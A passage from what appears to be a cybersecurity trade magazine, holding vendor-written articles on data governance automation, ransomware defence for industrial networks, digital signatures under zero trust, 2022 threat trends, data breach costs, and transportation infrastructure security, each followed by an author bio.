⚫ 1,540,000 professionals with “security” in their job title;

⚫ 635,000 professionals with “compliance” in their job title; and

⚫ 16,000 professionals with “data” and “governance” in their job title -- a 40X to 100X difference.

So, Data Governance is typically an invisible fabric between existing teams. Or, as we like to say, Data

Governance takes a village -- it’s a shared responsibility that requires coordination and collaboration

across multiple teams.

Data Governance: A Myriad of Manual Tasks

Especially because of its cross-functional nature, Data Governance has traditionally been executed via

manual effort. Going back to the definition above, Data Governance consists of:

⚫ The actions people must take,

⚫ The processes people must follow, and

⚫ The internal standards or data policies that apply to data

That implies a whole lot of manual effort. Take some typical, day-to-day data governance processes

found in many organizations:

⚫ An employee needs temporary access to a specific data set to do an analysis for a project.

 Employee submits a ticket via Jira or ServiceNow to the Security team to request access

to the data. Request includes description of the data set, executive sponsor for the project,

time frame for access to the data set, etc.

127

 Security team receives the request and starts an access control assessment.

 Security team validates the request with the executive sponsor.

 Security team validates the content of the data set with the Data team.

 Security team approves the request and grants access to the data set.

 Later, the Security team revokes the employee’s temporary access to the data set.

⚫ Compliance team asks the Data team to fill out the semi-annual sensitive data audit.

⚫ Compliance team asks the Security team to fill out the quarterly access control audit.

Performing all these manual Data Governance tasks takes a lot of time and energy. In addition -- and

more importantly -- the fact that data is really only being governed on-demand (during an up-front

assessment) or periodically (in recurring audits) highlights a massive vulnerability for most organizations:

apart from those manual up-front assessments and occasional audits, Data Governance is being left up

to chance, good intentions, and best behavior.

Which means data isn’t really being governed at all.

It’s Time for DataGovOps

SalesOps measures and evaluates sales data to determine the effectiveness of a product, sales

process, or campaign. Similarly, MarketingOps measures and evaluates marketing data to determine

the effectiveness of marketing programs and campaigns.

DevOps is the combination of philosophies, practices, and tools that increases an organization's ability

to deliver applications and services at high velocity.

DevSecOps automates the integration of security at every phase of the software development lifecycle,

from initial design through integration, testing, deployment, and software delivery.

By analogy, Data Governance Operations -- or DataGovOps -- is the combination of practices and tools

that:

⚫ Automatically make data more secure, private, accurate, available and usable;

⚫ Guide people to take appropriate action and follow established process to better govern data;

and

⚫ Continually measure and evaluate how internal data standards – i.e., data policies – are being

adhered to.

DataGovOps is the collaborative data management practice focused on improving the communication,

integration and automation of context and policy among all Data Governance stakeholders in an

organization, including Security, Compliance, Privacy, and Data Owners. DataGovOps automates the

integration of security and compliance at every phase of the data lifecycle.

128

The cloud has transformed both the volume of data kept in organizations and the speed at which that

data is growing. Given cloud scale and cloud velocity, Data Governance can no longer be a hodge-podge

of manual steps and processes. It’s imperative for enterprises to automate their Data Governance

functions and invest in systems that continuously ensure that their data is being appropriately stored,

used, and deleted.

It’s time for the DataGovOps revolution.

About the Author

Ani Chaudhuri, CEO, Dasera Ani Chaudhuri is an award-winning

executive and entrepreneur with a track record of building

successful products, businesses and teams. Ani is driven to bring

important solutions to market, and has founded four technology

companies to date: eCircle, acquired by Reliance in India; Opelin,

acquired by Hewlett-Packard; Whodini, acquired by Declara; and

Dasera. Prior to Dasera, Ani worked at McKinsey, HP and Tata

Steel. Ani can be reached online at

https://www.linkedin.com/in/anionline/ and at our company

website http://www.dasera.com/

129

130

Preventing Ransomware Attacks on

Industrial Networks

By Michael Yehoshua, VP Marketing, SCADAfence

Ransomware Works

That’s the simplest way to explain why incidents of ransomware attacks have been growing steadily for

the past two years — with no end in sight. The number of ransomware attacks has jumped by 350 percent

since 2018, the average ransom payment increased by more than 100 percent, downtime is up by 200

percent and the average cost per incident is on the rise, according to a recent report from PurpleSec.

Threat actor groups with names such as Ryuk, Egregor, Conti, Ragnar Locker, and many others are

ruthless, well-funded, and are willing to target anyone; from COVID-19 vaccine manufacturers,

automotive manufacturers, critical infrastructure, governments, and hospitals to get their payday. In fact,

the first ransomware-related death happened this past September, when a German hospital was infected

with ransomware and couldn't treat patients during the Covid-19 outbreak.

As part of SCADAfence’s mission to protect the lives and safety of civilians, we’ve put together this guide

to help you prevent ransomware in your industrial organization.

131

The Ransomware Encryption Process

Let’s go back to the beginning and discuss how these attacks encrypt systems in the first place.

From the previous ransomware attacks we’ve researched, we learned that from the minute the attackers

get initial access, they can encrypt the entire network in a matter of hours. In other cases, attackers would

spend more time in assessing which assets they want to encrypt and they’d make sure they get to key

servers such as storage and application servers.

Most of the recent ransomware attacks you’re reading about in the news try to terminate antivirus

processes to make sure that their encryption process will go uninterrupted. Recent ransomware variants

such as SNAKE, DoppelPaymer, and LockerGoga even went further by terminating OT-related

processes like Siemens SIMATIC WinCC, Beckhoff TwinCAT, Kepware KEPServerEX, and the OPC

communications protocol. This made sure the industrial process was interrupted, and this increased the

chances that the victims paid the ransom. These types of ransomware attacks were seen in the recent

attacks of Honda and ExecuPharm.

Diagram #1 - An OT Security Challenge: Industrial Components Exposed to Encryption

From what we’ve seen, ransomware generally encrypts Windows and Linux machines. We still haven’t

seen any PLCs being encrypted. However, many industrial services are run on Windows / Linux machines

- such as historians, HMIs, storage, application servers, management portals, and OPC client/servers.

In many cases, ransomware operations would not stop in the IT network, and will also attack OT

segments. More encrypted devices mean a higher monetary ransom demand from the attackers.

Organizations must be able to monitor & detect threats across the IT/OT boundary to effectively identify

risks before reaching process-critical endpoints.

132

Diagram #2 - Ransomware Prevention: How You Can Prevent Ransomware Attacks On Your Industrial

Networks

Some of the tools and techniques that ransomware operators are using are on the same level that nation-

state threat actors are using on targeted espionage campaigns.

Diagram #3 - Tactics, Techniques & Procedures Most Commonly Used in Ransomware Attacks

We recommend that organizations practice these common security procedures to minimize their

risk of ransomware infection on each step of the kill chain:

133

Initial Access:

1. RDP

a. If possible, replace RDP with a remote access solution that requires two-factor

authentication; many VPNs now support that. This will require attackers to be verified by,

for example, a code sent via SMS.

b. If you choose to still use RDP, make sure its Windows Update is enabled and is working.

2. Email Phishing

a. Educate the organization’s employees about phishing attacks. Employees should be

suspicious of emails that don’t seem right and not click on suspicious links.

b. Install an anti-phishing solution.

3. Software Vulnerabilities of Internet-Facing Servers

a. Scan your organization’s IP range from outside the network. Verify that all exposed

IP/ports are what you expect them to be.

b. Make sure that automatic security updates are enabled for your exposed services. If one

of your services (such as web servers, for example) does not have that feature, consider

changing it to a similar one that has this feature.

Lateral Movement:

1. Firewalls & Windows Update

Enable firewalls on all of your workstations and servers.

Make sure that Windows Update is enabled. This will ensure that your machines will be patched

for the latest vulnerabilities and will also be less prone to lateral movement techniques.

Microsoft constantly updates their security policies and their firewall rules.

One good example is that they disabled the remote creation of processes using the task

scheduler ‘at’ command.

2. Endpoint Protection

Endpoint protection works. Beyond blocking classic hackers’ techniques, some also have

defenses against ransomware and will protect your assets from encryption.

3. Network Segmentation

Ideally, you would want to minimize the risk of your industrial network being impacted when

suffering a ransomware attack.

a. To the possible extent, separate the IT network from the OT network segment. Monitor

and limit the access between the segments.

134

b. Use different management servers to the OT and IT networks (Windows domains, etc).

By doing so, compromising the IT domain will not compromise the OT domain.

4. Constant Network Monitoring

A constant network monitoring platform (we happen to know a really good one), will help you

identify threats while analyzing network traffic and will help you see the bigger picture of what’s

happening in your network.

5. Data Exfiltration

Monitor your network for unusual outbound traffic. Everyday user activity should not generate

uplink activity higher than about 200MB/daily per user.

How SCADAfence Helps You

We provide a comprehensive solution - The SCADAfence’s platform which was built to protect industrial

organizations like yours from industrial cyber attacks (including ransomware). It also helps you implement

better security practices amongst its built-in features. Some of these include:

• Asset Management

• Network Maps

• Traffic Analyzers

These tools will help your organization to implement better network segmentation, to make sure that your

firewalls are functioning properly, and that every device in the OT network is communicating only with

the ones that they should be communicating with. You will also be able to spot assets that are not where

they're supposed to be, for example, forgotten assets in the DMZ.

The platform, which is also the highest-rated OT & IoT security platform, also monitors the network traffic

for any threats, including ones that are found in typical ransomware attacks; such as:

• Security exploits being sent across the network.

• Lateral movement attempts using the latest techniques.

• Network scanning and network reconnaissance.

In an event of a security breach, SCADAfence’s detailed alerts will help you to contain these threats as

quickly as possible. Ultimately, we built this tool to help industrial organizations to understand their attack

surface, to implement effective segmentation and constant network monitoring for any malicious or

anomalous activity.

We’d like to share with you a true story of our recent incident response to an industrial ransomware

cyberattack. SCADAfence’s incident response team assists companies in cybersecurity emergencies. In

this video, we will review a recent incident response activity in which we took part. This research has

been published with the goal of assisting organizations to plan for such events and reduce the impact of

targeted industrial ransomware in their networks.

For more detailed information on this story, we prepared a full whitepaper here:

135

About the Author

Michael Yehoshua, VP Marketing, SCADAfence

Michael brings 15 years of marketing creativity and out-

of-the-box thinking to SCADAfence. Before joining the

team, Michael was the Director of Marketing at TrapX

Security, where he was famous for thought leadership

and for turning a small, declining startup into a

successful, profitable world-leading vendor in their

vertical. Prior to that, Michael was the VP of Marketing

at AMC and rebuilt their entire marketing architecture,

bringing in strong revenue figures that the firm has't seen

in decades. Michael studied at Harvard Business

School, at Bar Ilan University for his MBA & Lander

College for his BS degrees in Marketing and Business

Management. Michael can be reached at

Michael@scadafence.com and at our company website

https://www.scadafence.com/

136

By design, zero trust mandates that all resources, regardless of physical or network location, undergo

verification, authentication, and thorough authorization before being allowed access to another resource.

The Office of Management and Budget has set 2024 as the target date for the completion of a zero trust

architecture throughout the Federal government.

Agencies are simultaneously in the midst of the largest digital transformation they have ever undertaken.

The pandemic expedited this change, often resulting in hasty and makeshift solutions. On the path to

lasting modernization, zero trust must be assumed in every digital interaction, of which signatures are

among the most prolific.

Zero-Trust Architecture Is Incomplete

Without Digital Signatures

Zero trust is often mistakenly understood as merely a matter of cybersecurity; however,

adhering to zero trust is a crucial factor in agency IT modernization.

By Geoff Mroz, Principal Digital Strategist, Adobe

137

Accelerating the use of e-signatures is a priority identified for all agencies in the “Executive Order on

Transforming Federal Customer Experience and Service Delivery to Rebuild Trust in Government.” E-

signatures can dramatically reduce paperwork, broaden the accessibility of government services, and

streamline cumbersome approval processes.

However, it is imperative that e-signatures meet the security standards set out by the OMB’s zero trust

memorandum. In instances where additional levels of assurance (LOA) are necessary, digital signatures

are preferable to e-signatures.

What to look for in a digital signature solution

Security requirements for e-signatures vary by region, agency, data and classifications levels. E-

signatures use common authentication methods such as passwords or email verification, but for sensitive

information, such minimal precautions are not nearly sufficient.

There are some cases where additional LOA for signer identification are needed, and that’s where digital

signatures come in. Digital signatures are a specific type of e-signature that is backed by a digital

certificate as proof of a signer’s identity that is cryptographically bound to the signature field using public

key infrastructure (PKI).

To achieve this strong security posture, digital signatures must uniquely identify each signer.

Furthermore, the signer’s identity must be reconfirmed prior to signing with tools such as a PIN or a

secure signature device like a USB token or cloud-based hardware security module. Digital signatures

must also demonstrate proof of signing with a tamper-evident seal and have the ability to re-confirm

authenticity for at least 10 years.

For agencies seeking to liberate themselves from arduous paper-based authorizations, while also

adhering to zero trust’s strict identity and access management standards, digital signatures are an

invaluable tool.

Government agencies are eager to adopt digitization practices, such as digital signatures, that will

simplify their workload and make the lives of everyday citizens easier. However, security is paramount.

To ensure any solutions adopted by agencies to meet their individual security needs, the Federal Risk

and Authorization Management Program (FedRAMP) was created.

How FedRAMP authorization provides peace of mind

FedRAMP authorizes cloud-based solutions for government agencies at Low, Moderate, and High Impact

levels. The Moderate Impact level accounts for 80% of authorizations and is designed to protect sensitive

data, such as personally identifiable information (PII). Furthermore, the FedRAMP Moderate designation

aligns with NIST controls for Zero Trust. Encryption management and is FIPS 140-2 verified, which

ensures that cryptographic modules have met NIST security requirements. 

138

With over 325 security controls verified by third-party auditors, agencies can have confidence in their

FedRAMP Moderate tools to ensure the protection of sensitive information and compliance with any zero

trust architecture.

In every department, at every level, both internally and externally, signatures are required to keep track

of approval processes and decision making. In the modern, hybrid world, paper signatures are no longer

feasible, and government agencies should not be trapped in the past because their security standards

are inherently stricter.

Digital signatures can be used for things like government benefits applications, healthcare forms, and

other documents that are part of higher-value, higher-risk, or strictly regulated processes. A FedRAMP

Moderate digital signature solution eases the signing experiences for employees and constituents,

meaning public interactions can have the speed, ease, and security that modern government requires.  

The modern government mindset

Additionally, an inevitable factor in the conversation around IT modernization in the federal government

is interoperability. With over 100 federal agencies, it is crucial that any new tools integrate seamlessly

with existing software and function effectively across agencies.

When considering the capacity for interoperability and integration in federal agencies, digital signature

solutions should be compatible with personal ID verification (PIV) cards, common access cards (CAC)

and mobile credentials.

When prioritizing efficiency, solutions capable of wrapping document creation, signature capture,

tracking, and archiving into a consolidated secure workflow are preferable as they relieve agency

employees from the burden of double and triple checking if their documents and download credentials

comply with agency rules.

Achieving digital transformation goals, zero trust architecture, and cross-agency collaboration should not

be viewed as competing priorities. In fact, the three should be understood as part of the same, modern

government mindset. With the right digital signature tool, agencies can satisfy a component of all these

objectives at once.

While digitization tools can unlock unprecedented capabilities for government, protecting citizen and

agency data is critical. Agency IT leaders should seek out FedRAMP certified solutions that can enable

them to work effectively in a digital world, without compromising on security.

139

About the Author

Geoff is the Principal Digital Strategist at Adobe. In his

nearly 14 years with the company, Geoff has been an

invaluable solutions consultant who consistently strives for

digital innovation. He possesses extensive knowledge of

enterprise security architecture, full lifecycle enterprise

application development, agile coding, enterprise

applications integration, SOA, and UI/X design and

construction across a wide range of technical architectures.

Perhaps even more important, Geoff has a knack for

bringing people, businesses, and technology together to

help companies deliver on the promise of digital

transformation and creative productivity.

Geoff can be reached online at https://www.linkedin.com/in/geoffreymroz/ and at our company website

https://business.adobe.com/solutions/industries/government.html

140

Trends To Ensure Cybersecurity In 2022

By Héctor Guillermo Martínez, President of GM Sectec

With the arrival of the pandemic almost 2 years ago, it became clear that companies are increasingly

vulnerable to attacks by hackers and cybercriminals. In this period, in particular, these incidents have

occurred in large part due to the fact that most companies have had to work with their workforce from

home, which has opened up a huge gap that cybercriminals have been able to exploit. Below, we share

some reflections that assess critical trends that CISOs (Chief Information Security Officer) must take into

account during this 2022.

Ransomware or data hijacking is not going away anytime soon. Thanks to the particularity of working

from home or home office, this attack modality has become standard and has increased considerably

throughout 2021 due to the fact that workers do not have the necessary protection of their equipment to

avoid any kind of vulnerability of their data. The 2021 figures seem to ensure that in 2022 this type of

cyber threat will continue.

In 2021, almost 500 million cyber-attacks of this type have been recorded, which is equivalent to an

increase of 148 percent compared to 2020, according to a SonicWall report presented at a conference

held at the White House. The most affected segment, and one that will surely continue to be targeted by

cybercriminals, will be the banking sector.

Log4j will be the most serious cybersecurity flaw in decades. The flaw is present in a popular software

called Log4j, which is part of the ubiquitous Java programming language. Log4j is used by millions of

websites and applications, and the software flaw potentially allows hackers to take control of systems by

writing a simple line of code. This bug is more serious than other cybersecurity flaws because of its

141

ubiquity, simplicity, and complexity. It is a piece of software, open source, that is in millions of devices,

from video games to hospital equipment to industrial control systems to cloud services.

Website cloning and online fraud. Website cloning will be one of the threats that users in general will

have to watch out for, because cybercriminals have become expert cloners of "official" web pages,

through which they carry out frauds that put personal and banking data at risk.

Verifying the veracity of the website and providing tools for users to understand how to perform this

verification will be the key in 2022 for cybersecurity companies to support their customers.

The normalization and massification of the use of cryptocurrencies. Although there are already many

places where the use of cryptocurrencies is becoming widespread, we must not forget that this is the

preferred method of payment for cybercriminals, and that thanks to its use it is possible to access user

data.

This payment method, unlike regular money, does not have the protection of banking regulations and

could make its holders easy targets for cybercriminals, who could use any type of ransomware to hijack

and use their data.

The use of cybersecurity will be mandatory. Much has happened throughout these almost two years of

pandemic, but if we have witnessed anything, it is that cybersecurity should not be an option but the

norm.

Not only have large corporations understood that their cybersecurity systems must be updated and

extended to personal devices, but Latin American governments have understood that cybersecurity must

be regulated and become a mandatory standard to be applied.

During 2022, we will see how governments in much of the region will impose on public and private

companies the use of new cybersecurity tools that expand their scope and protect the data of the people

involved with a broader spectrum.

More contactless payment technology, fewer physical transactions. The use of digital channels in banking

has had a positive impact during the confinements, which has led banks to encourage the use of different

technological options during the day-to-day life of consumers. Electronic payment, in its different

modalities, will continue to gain strength. This makes it even more important to establish controls and

standards (such as PCI DSS) in organizations that process, store and/or transmit cardholder data, to

secure such data, in order to avoid fraud involving debit and credit payment cards.

Already in 2022, and with the expectation of a return to normality, the question to answer is: has the

learning from these two years of pandemic helped companies to understand that the protection of their

human resources' data goes beyond the walls of their organization?

142

About the Author

Hector Guillermo Martínez is President at GM Sectec. Hector G is

responsible for the growth, vision, and execution of the company. GM

Sectec creates innovative tailored solutions that help accelerate business

breakthroughs in the areas of managed detection and response services,

digital forensics, multi-tenancy, business continuity, information security,

automation, and process orchestration with the goal of ultimately delivering

outstanding cost efficiencies to our customers and partner community. GM

Sectec is a global company with Headquarters in Puerto Rico and offices

in Florida, Mexico, Panama, Colombia, Brazil, Chile, Spain, and Australia

with clients in over fifty countries. GM Sectec is a global Cybersecurity150

listed company, a Top 100 MSSP Listed organization, a certified PCI

Forensic Investigator, and a member of the Forum of Incident Response

and Security Teams (FIRST.org). Hector G. has been with GM Sectec

since 2014.

Prior to GM Sectec, Hector G. was based in Singapore leading EMC Corporation’s security practice

across the Asia Pacific region. Hector G. joined EMC in 2008, focusing on physical & information security

initiatives, projects, and evangelizing EMC’s leadership in the vertical as well as managing Aerospace &

Defense alliances with Raytheon, Insert Corporate Image Here (May 2020) General Dynamics, BAE,

Lockheed Martin among other MSI’s (Mission Systems Integrators). With over 20 years in business

development, security & safety platform integration and cross jurisdictional law enforcement, Hector G.

has been involved in project implementation, development, and investigations in the United States, Israel,

Asia-Pacific, and Latin America.

Reporting directly to EMC's APJ Chief Technology Officer, Hector G was tasked with developing markets

for EMC in Asia Pacific / Japan across the entire EMC & RSA product and solution portfolio of market

leading technologies. The CTO office owns the technology evolution for EMC Corporation, including

responsibility for technical strategy in EMC's entire product portfolio including Storage,

Backup/Recovery/Archiving, Information Lifecycle Management and Security. Hector G worked closely

with EMC's Office of Technology, which is responsible for defining the company's evolving technology

vision and technology strategy, as well as working with the industry on standards.

Since 2004 Hector G. has been a licensed Private Investigator, focusing on investigation and forensics

with government, academia, and the private sector. Other areas of focus have been in executive and

dignitary protection, serving with a Louisiana Parish Police Department, certified as a practicing Personal

Protection Specialist (P.P.S) from the Executive Protection Institute in Berryville, Virginia. Assignments

have been from single focus to multi-jurisdictional task forces focusing on advance work and perimeter

protection. Hector G is PCI-QSA certified and an ISO 27001 Lead Implementer & Auditor. Hector G. has

an MBA from CUNY, Zicklin School of Business and is an alum of Harvard Business School.

Héctor G. Martínez can be reached online at hector.g.martinez@gmsectec.com or at our company

website http://www.gmesectec.com

143

As our world gets smaller, and our systems for sharing information become increasingly interconnected,

breaches are becoming an inevitability. It’s no longer a matter of if, but when, your data will come under

attack – but do you have any idea how precious your data actually is?

The criminals who steal data – whether for the purpose of blackmail, identity theft, extortion or even

espionage – are finding themselves competing in an increasingly crowded marketplace. Over the course

of the global coronavirus pandemic, as the lines between our personal and professional lives and devices

blurred like never before and ransomware proliferated, hackers became more active and empowered

than ever.

According to Privacy Affairs’ latest Dark Web Price Index, the stolen data market grew significantly larger

in both volume and variety over the last year, with more credit card data, personal information and

documents on offer.

As the supply of stolen data has grown, prices for each individual piece of data have plummeted. Hacked

credit card details that would have sold for US$240 in 2021 are going for US$120 in 2022, for instance,

and stolen online banking logins are down from US$120 to US$65.

How Much Is Your Data Actually Worth?

By Jamie Wilson, MD & Founder, Cryptoloc Technology Group

144

But this hasn’t discouraged cybercriminals. Instead, dark web sites have begun resorting to traditional

marketing tactics like two-for-one discounts on stolen data, creating a bulk sales mentality that places an

even greater imperative on cybercrime cartels to amass large quantities of data.

This makes it even more likely that your data will be stolen, because even if your organisation isn’t

specifically targeted, you could be caught up in an increasingly common smash-and-grab raid – like the

attack on Microsoft that exposed around a quarter of a million email systems last year.

And while the value of each piece of data on the dark web is decreasing for cybercriminals, cyber attacks

are just getting costlier for the businesses the data is stolen from.

How much is your data worth to your business?

Not sure how much your data is worth? The exact answer is impossible to quantify definitively, as it will

change from one business and one piece of data to another, but it’s clear that having your data stolen

can have devastating consequences.

According to the Cost of a Data Breach Report 2021 from IBM and Ponemon, which studied the impacts

of 537 real breaches across 17 countries and regions, the per-record cost to a business of a data breach

sits at US$161 per record on average – a 10.3 per cent increase from 2020 to 2021.

For a personally identifiable piece of customer data, the cost goes up to US$180 per record. Not only is

this the costliest type of record, it’s also the most commonly compromised, appearing in 44 per cent of

all breaches in the study.

For a personally identifiable piece of employee data, the cost sits at US$176 per record. Intellectual

property costs US$169 per record, while anonymised customer data will set you back US$157 per record.

But it’s extremely unlikely that a cybercriminal would go to the effort of hacking your business for one

piece of data. In that sense, it’s more instructive to look at the average cost of a data breach in total –

which currently sits at a staggering US$4.24M.

For ransomware breaches, in which cybercriminals encrypt files on a device and demand a ransom in

exchange for their encryption, the average cost goes up to US$4.62M, while data breaches caused by

business email compromise have an average cost of US$5.01M.

Breaches are costliest in the heavily regulated healthcare industry (US$9.23M) – a logical outcome, given

the heightened sensitivity of medical records. By comparison, the ‘cheapest’ breaches are in less

regulated industries such as hospitality (US$3.03M).

Mega breaches involving at least 50 million records were excluded from the study to avoid blowing up

the average, but a separate section of the report noted that these types of attacks cost 100 times more

than the average breach.

The report found the average breach takes 287 days to identify and contain, with the cost increasing the

longer the breach remains unidentified. So when it comes to cybercrime, time really is money.

145

IBM and Ponemon broke the average cost of a breach up into four broad categories – detection and

escalation (29 per cent), notification (6 per cent), post-breach response (27 per cent) and lost business

cost (38 per cent). Lost business costs include business disruption and revenue losses from system

downtime; the cost of lost customers; reputation losses; and diminished goodwill.

A 2019 Deloitte report determined that up to 90 per cent of the total costs in a cyberattack occur beneath

the surface – that the disruption to a business’ operations, as well as insurance premium increases, credit

rating impact, loss of customer relationships and brand devaluation are the real killers in the long run.

It can take time for the true impacts of a breach to reveal themselves. In 2021, the National Australia

Bank revealed it had paid $686,878 in compensation to customers as the result of a 2019 data breach,

which led to the personal account details of about 13,000 customers being uploaded to the dark web.

The costs included the reissuance of government identification documents, as well as subscriptions to

independent, enhanced fraud detection services for the affected customers. But the bank also had to hire

a team of cyber-intelligence experts to investigate the breach, the cost of which remains unknown.

The IBM and Ponemon report confirms that the costs of a data breach won’t all be felt straight away.

While the bulk of an average data breach’s cost (53 per cent) is incurred in the first year, another 31 per

cent is incurred in the second year, and the final 16 per cent is incurred more than two years after the

event.

And with the recent rise of double extortion – in which cyber criminals not only take control of a system

and demand payment for its return, but also threaten to leak the data they’ve stolen unless they receive

a separate payment – we’re likely to see data breaches exact a heavy toll for even longer time periods

moving forward.

How can you protect your data?

Data breaches are becoming costlier and more common, so it’s more important than ever to ensure your

data is protected.

Many businesses are turning to cyber insurance to protect themselves. Cyber insurance typically covers

costs related to the loss of data, as well as fines and penalties imposed by regulators, public relations

costs, and compensation to third parties for failure to protect their data.

But as breaches become a virtual inevitability and claims for catastrophic cyberattacks become more

common, insurers are getting cold feet. Premiums are skyrocketing, and insurers are limiting their

coverage, with some capping their coverage at about half of what they used to offer and others refusing

to offer cyber insurance policies altogether.

Regardless, cyber insurance is not a cyber security policy. Even the most favourable cyber insurance

policy doesn’t prevent breaches, but merely attempts to mitigate the impact after the horse has already

bolted.

146

The best approach is to educate your employees and other members of your organisation about cyber

security, and put the appropriate controls and best practices in place, including using multi-factor

authentication, implementing zero trust policies, and backing up and encrypting data.

The IBM and Ponemon report found that the use of strong encryption – at least 256 AES, at rest and in

transit – was a top mitigating cost factor. Organisations using strong encryption had an average breach

cost that was 29.4 per cent lower than those using low standard or no encryption.

When data is safely and securely encrypted, any files a cybercriminal gains access to will be worthless

to them without an encryption key. My business, Cryptoloc, has taken this principle even further with our

patented three-key encryption technology, which combines three different encryption algorithms into one

unique multilayer process.

Built for a world without perimeters, our ISO-certified technology has been deployed across multiple

products, including Cryptoloc Secure2Client, which enables users to send fully encrypted documents

directly from Microsoft Outlook.

We’ve recently made Secure2Client available on the Salesforce AppExchange, so that marketing, sales,

commerce, service and IT teams using Salesforce around the world can encrypt the reports they send to

clients and third parties that are sensitive or confidential in nature.

This protects Salesforce users from the potentially catastrophic ramifications of a data breach, while

allowing them to continue using the existing application that their business is built around.

We’ve also rolled out a new Ransomware Recovery capability that empowers users to protect and restore

their data in real-time in the event of an attack, ensuring they never have to pay a costly ransom for the

return of their data.

With Ransomware Recovery, every version of every file a user stores in the Cloud is automatically saved.

If they suspect they’ve been the victim of a ransomware attack, they can simply lock down their Cloud

temporarily to stop the spread of malware; view their files’ audit trails to determine when the attack

occurred; roll back their data to the point before it was corrupted; and then unlock their Cloud.

This ensures users can recover their data as quickly and effectively as possible, minimising costly

disruptions to their business, removing the need for a lengthy and expensive investigation, and ensuring

they never have to pay a cent to a cybercriminal to get back the data that’s rightfully theirs.

Yes, cyber attacks are inevitable – but victimhood isn’t. If you take the right precautions, you can prevent

costly breaches and maintain control of your precious data.

147

About the Author

Jamie Wilson is the founder and chairman of Cryptoloc,

recognized by Forbes as one of the 20 Best Cybersecurity

Startups to watch in 2020. Headquartered in Brisbane,

Australia, with offices in Japan, US, South Africa and the

UK, Cryptoloc have developed one of the world’s strongest

encryption technologies and cybersecurity platforms,

ensuring clients have complete control over their data.

Jamie can be reached online at

www.linkedin.com/in/jamie-wilson-07424a68 and at

www.cryptoloc.com

148

149

Airports, Bridges, and Beltways

Cyber and Physical Transportation in the Transportation Industry

By Alan Cunningham, Journalist, Truth Be Told

Like with most other areas of business, government, public safety/service, and society, the transportation

system of the U.S. faces a wealth of challenges and threats. For clarity, the transportation sector

encompasses “a category of companies that provide services to move people or goods, as well as

transportation infrastructure…[consisting] of several industries including air freight and logistics, airlines,

marine, road and rail, and transportation infrastructure” while being further broken “down into the sub-

industries air freight and logistics, airlines, marine, railroads, trucking, airport services, highways and

rail tracks, and marine ports and services”.

From natural disasters to supply chain issues, trucking and transportation allows the United States to

function; without the ability to gain food, water, or other essential supplies, the society of a given county,

state, region, or even potentially the nation could crumble and be unable to function.

The most glaring of these threats to the transportation industry comes from cyberspace, with foreign

intelligence services, terrorist groups, and individual hackers being able to potentially, "[collect] private

financial, personal and health information of their employees, as well as account numbers and other

protected information of clients...[render Electronic Logging Devices] inoperable by a virus, ransomware

or other hacking event [resulting in lost revenue and people being unable to get to their destination]",

hack into a company's computer systems to cause a companywide failure resulting in delays, spoilt

perishables, or a shutdown of all computer systems followed by a demand for money (a very real threat

to any company). The failures of these systems would result in very serious problems for the

transportation industry and, being that truckers are the backbone of the vast majority of businesses in

the United States, the halting of their systems would be incredibly detrimental to the overall conduct of

business in the country.

From a cybersecurity standpoint, there are naturally the basic suggestions of better training, more aware

employees, and doing routine security checks are imperative, however, this is from a company

standpoint. The U.S. Department of Transportation (DoT) can adequately help in these matters too, by

providing better security systems for vehicles to prevent against vehicle hackings, holding joint private

industry-business/government discussions on cyber threats and security, and better improving the

communications systems of vehicles so they are not open to attack. The Department of Homeland

Security too can and must provide training and advice to the private sector in that transportation not only

includes land, but also sea and air travel, which, if corrupted, would severely incapacitate Americans

ability to travel and the import and export of essential goods and services.

150

Cyber is not the only large challenge to the transportation industry either. It is well-documented that the

physical standing of America’s infrastructure is not the most secured or well-developed, with the

American Society of Civil Engineers estimating that, "the US needs to spend some $4.5 trillion by 2025

to improve the state of the country's roads, bridges, dams, airports, schools, and more," while

emphasizing that congestion at airports and sea ports is a serious problem and results in delays and

transportation problems, that roughly 32.6 percent of bridges being over fifty years old and in need of

repair, that many of the railway projects in the U.S. are, "backlogged [by] 111 years", that 46 percent of

both urban and rural roads, "are in poor condition", that public transit is severely underfunded and in need

of billions of dollars, and finally that many ships navigating the inland waterways have trouble doing so

due to dams and locks becoming old and rusted.

Clearly, there was a need for a massive funding of public works and infrastructure projects which would

absolutely help the land, sea, and air transportation systems grow and become larger than they once

were. This was answered in the aftermath of the 2020 U.S. presidential election in which Biden worked

to get passed in Congress a bipartisan infrastructure bill which has the overall goal of “[rebuilding]

America’s roads, bridges and rails, expand access to clean drinking water, ensure every American has

access to high-speed internet, tackle the climate crisis, advance environmental justice, and invest in

communities that have too often been left behind…[in addition to easing] inflationary pressures and

strengthen supply chains by making long overdue improvements for our nation’s ports, airports, rail, and

roads”. According to CNBC News, once the $1 trillion bill was passed in November of 2021, the law

provides “$110 billion into roads, bridges and other major projects. It will invest $66 billion in freight and

passenger rail, including potential upgrades to Amtrak [and directs] $39 billion into public transit systems”.

However, there are still many issues with this bipartisan bill. One is that a great majority of Americans

still live in rural, more country areas which makes gaining necessary supplies difficult and burdensome

in addition to gaining access to strong broadband capabilities. A complete overhaul of the transportation

sector, ensuring it is protected physically and cyberspatially, is highly important to ensuring Americans

have access to essential supplies as well as ensuring that all Americans will be able to have access to

their goods and transport their goods abroad in a timely fashion, all should be challenges the next

presidential administration (and the one after) should seriously focus on.

In regards to the national highway system, I would disagree that it is the most resilient and robust CIKR.

A 2017 article from Forbes details how places like Chicago and San Francisco, locations with high urban

density and traffic, are at a higher risk and are more susceptible to poor and crumbling infrastructure. It

is very apparent that the national highway system of the U.S. is in dire need of additional assistance

(going beyond the bipartisan bill, a variety of other solutions that would benefit the environment and the

economy overall) and I would hesitate to call the roads and highways of the United States a robust or

resilient system. While this may have been true throughout the mid to late 20th century, in the past twenty

years, upkeep of America's roadways has severely declined.

151

Nonetheless this is changing rapidly. Just recently, in March of 2022, the Biden administration and the

DoT’s “Federal Transit Administration… awarded $409.3 million in grants to 70 projects in 39 states to

modernize and electrify America’s buses, make bus systems and routes more reliable, and improve their

safety”. These grants and economic supplements “support modernizing and improving the most

widespread form of transit in America and will help dozens of communities buy new-technology and

electric buses, such as electric buses, that reduce or eliminate greenhouse gas emissions, promote

cleaner air, and help address the climate crisis” this being in addition to the millions already received in

the bill. Biden also has advanced the Trucking Action Plan which aims to “[build] supply chain resilience

through better quality trucking jobs…[and increase] federal funding to expedite issuance of commercial

driver's licenses, expanded outreach efforts to veterans through the Department of Veterans Affairs, and

established a joint initiative between the Departments of Labor and Transportation to expand recruitment

and advocate for employees”.

The Biden administration is working hard on these issues, yet it still seems to neglect the cyberspace

